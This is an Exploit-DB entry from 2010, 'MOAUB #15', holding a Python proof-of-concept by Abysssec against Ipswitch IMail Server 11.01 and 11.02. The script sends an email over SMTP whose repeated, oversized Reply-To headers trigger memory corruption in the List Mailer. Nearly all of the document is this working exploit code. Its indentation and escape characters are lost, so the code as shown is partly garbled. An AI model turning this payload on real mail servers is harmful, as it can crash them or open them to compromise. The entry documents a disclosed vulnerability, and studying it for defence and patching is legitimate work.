[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MOAUB #15 - Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption
# Published : 2010-09-15
# Author : Abysssec
# Previous Title : Chalk Creek Media Player 1.0.7 .mp3 and .wma Denial of Service Vulnerability
# Next Title : MediaHuman Music Converter 1.0.1 .wav and .mp3 Denial of Service
'''
__ __ ____ _ _ ____
| / |/ __ / | | | | _
| / | | | | / | | | | |_) |
| |/| | | | |/ / | | | | _ <
| | | | |__| / ____ |__| | |_) |
|_| |_|____/_/ _____/|____/
http://www.exploit-db.com/moaub-15-ipswitch-imail-server-list-mailer-reply-to-address-memory-corruption/
'''
'''
Title : Ipswitch Imail Server List Mailer Reply-To Address memory corruption
Version : Imail server v11.01 and 11.02
Analysis : http://www.abysssec.com
Vendor : http://www.ipswitch.com
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
'''
import smtplib
sender = 'from@fromdomain.com'
receivers = ['CrashList@wapteam-f556693']
message = """From: From Person <from@fromdomain.com>
To: To Person <CrashList@wapteam-f556693>
"""
#ReplayCount = 5
#while ReplayCount>0:
# message = message + "Reply-To:"
counter = 3
while counter>0:
# if counter != 50000 :
# message = message + ","
#message = message + "Reply-To: <someone"+str(counter)+"@example.org>"
message = message + "Reply-To: "+("A"*200)+"a"*4+"B"*196+"@exam.com"
counter = counter - 1
message = message + "n"
# ReplayCount = ReplayCount - 1
#message = message + "n"
message = message + """
Subject: SMTP e-mail test
This is a test e-mail message.
"""
#print message
#fp = open("C:\Program Files\Ipswitch\IMail\spool\tmp188.tmp","w")
#fp.write(message)
#fp.close()
#print "wrote"
try:
smtpObj = smtplib.SMTP('localhost')
smtpObj.sendmail(sender, receivers, message)
print "Successfully sent email"
except SMTPException:
print "Error: unable to send email"